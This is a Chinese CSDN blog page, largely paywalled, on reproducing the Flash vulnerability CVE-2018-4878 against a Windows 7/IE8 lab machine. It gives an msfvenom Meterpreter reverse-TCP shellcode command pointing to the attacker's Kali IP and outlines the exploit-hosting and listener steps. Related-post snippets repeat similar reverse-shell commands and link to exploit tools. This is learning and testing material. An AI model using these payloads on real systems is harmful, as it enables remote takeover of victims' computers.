cve-2018-4878漏洞复现

最新推荐文章于 2024-08-11 23:50:54 发布
最新推荐文章于 2024-08-11 23:50:54 发布
阅读量4.6k 收藏 10
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K17010/article/details/80548558
版权
本文档详细介绍了如何复现CVE-2018-4878漏洞,涉及Windows7 SP1系统、旧版Adobe Flash和IE浏览器。首先,使用msfvenom生成shellcode,然后修改工具cve-2018-4878.py,生成exploit.swf和index.html文件。接着,在Kali Linux上启动apache2服务,将文件上传到web目录。最后,使用msfconsole监听模块等待靶机访问,成功后可获得靶机shell。
摘要由CSDN通过智能技术生成

靶机:Windows7 sp1

条件:Adobe Flash 28.0.0.137及其之前的版本     IE8浏览器及以前版本(IE9好像也行)

所需工具已上传

kali:192.168.43.16

(需要输入的命令均用<>标记出来,<>不需要输入)

准备工作:

kali中打开终端,找到下载的cve-2018-4878工具,切换到该路径(这种工具在未来应该尽量由自己写出来)

<msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.16 LPORT=4444 -f python>shellcode.txt>

生成shellcode.txt可以查看kali的shellcode

最低0.47元/天 解锁文章
陈晨0
关注
专栏目录
Flash漏洞CVE-2018-4878复现
玄道的网安博客
07-29 1370
简介 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 影响版本 FlashPlayer28.0.0.137及以前的所有版本 漏洞复现 使用msfvenom生成shell代码 生成代码,其lhost为kali的ip地址,lport为自定义的端口号 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=66.
Flash 0day漏洞CVE-2018-4878复现
weixin_44897902的博客
10-14 464
漏洞名:CVE-2018-4878 危害:造成远程命令执行 影响范围:Flash Player28.0.0.137及以前的所有版本 准备工作: kail: 192.168.91.146 win7,Flash Player28.0.0.137,IE8 这是一位前辈的Player: 链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0 事...
渗透学习之漏洞复现
最新发布
Zombie_QP的博客
08-11 468
2)i.d在php$_REQUEST,自动转为i_d,而 $request_uri 接收i.d就是i.d。这个代码在burp可以这样写,但是在页面的搜索框输入的话,要将其编码。然后咋们去进行burpsuit抓包,将抓到的包放入repeater里面。3)注入绕过 =(like) 单引号(十六进制) 空格(/**/)这里我们运用临时文件去做一个绕过,编写一个HTML文件。查看源代码后,发现有防范,那么应该如何去绕过呢?1)hpp全局污染,php接受相同参数。这里的两条限制了长度,限制了字母和数字。
Adobe Flash cve-2018-4878漏洞复现
weixin_34391854的博客
05-16 274
漏洞概述2018年2月1日, Adobe官方发布了Adobe Flash Player系列产品的安全通告(APSA18-01),该0day漏洞编号为CVE-2018-4878,目前最新版本28.0.0.137及其以前版本的Adobe Flash Player均受漏洞影响,Adobe官方于2月5日发布此漏洞补丁。gongji者可以将恶意Flash文件嵌入Office文档,网页,或者桌面应用,当用户打...
Adboe Flash远程代码执行_CVE-2018-4878漏洞复现
WY92139010的博客
07-03 272
Adboe Flash远程代码执行_CVE-2018-4878漏洞复现 一、漏洞描述 该漏洞可针对windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意Flash代码文件的Microsoft Office文档、网页、垃圾电子邮件等。 二、漏洞影响版本 Flash Player版本28.0.0.137以及之前的所有版本    三、漏洞复现环境搭建 攻击机:kali...
漏洞复现 CVE-2018-4878 Flash
weixin_44664530的博客
04-21 246
受影响版本 漏洞复现环境 Kali Linux Windows 7 sp1 cve-2018-4878.py flashplayer_activex_28.0.0.137.exe 工具自行下载 链接:https://pan.baidu.com/s/1Q-ryRThsdhsvOIc_Q5E9Bw 提取码:owad 环境配置 将flashplayer_activex_28.0.0.137.exe安装...
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
本篇将详细讨论如何修补OpenSSH的几个已知漏洞,包括CVE-2020-15778、CVE-2018-15473、CVE-2018-15919。 首先,让我们了解这些特定的漏洞: 1. CVE-2020-15778:这是一个与OpenSSH密钥协商过程相关的漏洞,可能...
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT输出利用rtf -i IP,--ip IP表示netcat -p PORT ,--port netcat的PORT端口 例如: ...
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
flash漏洞利用CVE-2018-4878
06-14
flash漏洞利用CVE-2018-4878。 。。。
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
CVE-2018-4878复现
大方子
10-07 4337
前言: CVE-2018-4878利用flash的漏洞来进行攻击,如果受害者的flash版本在28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。 1 漏洞影响范围 Flash Player28.0.0.137及以前的所有版本 2 漏洞复现 2.1 测试环境 攻击机:kali2017 靶机:win7_x64+IE8+FLASH_playe...
Flash 零日漏洞复现CVE-2018-4878
andiao1218的博客
03-15 217
项目地址:https://github.com/Sch01ar/CVE-2018-4878.git 影响版本为:Adobe Flash Player <= 28.0.0.137 攻击机器IP:192.168.220.152 目标靶机:192.168.220.151,浏览器为360浏览器 用msfvenom生成一个shellcode ┌─[root@sch01ar]─[...
[漏洞复现] CVE-2018-4878 Flash 0day
神仙哥哥的博客
05-23 2821
1、漏洞概述 2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞CVE-2018-4878)。 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 直到2018年2月5号,Adboe才发布补丁来修复此0...
本地复现Flash 0day漏洞(CVE-2018-4878)
weixin_30627381的博客
03-17 402
影响版本: Adobe Flash Player <= 28.0.0.137 EXP下载地址: 链接: https://pan.baidu.com/s/1_VVQfdx6gsJvEDJj51JgMQ 密码: d8tm 漏洞复现: 攻击机:kail 靶机:win7 x64 浏览器:360浏览器 0x01 生成shellcode msfvenom -p windows...
cve-2018-1297环境复现
08-03
CVE-2018-1297是一个Apache Struts框架的严重漏洞。...总结而言,要复现CVE-2018-1297漏洞需要设置实验环境、构造恶意请求、利用漏洞以及验证漏洞。这个漏洞的严重性需要及时修复和部署补丁以确保服务器的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值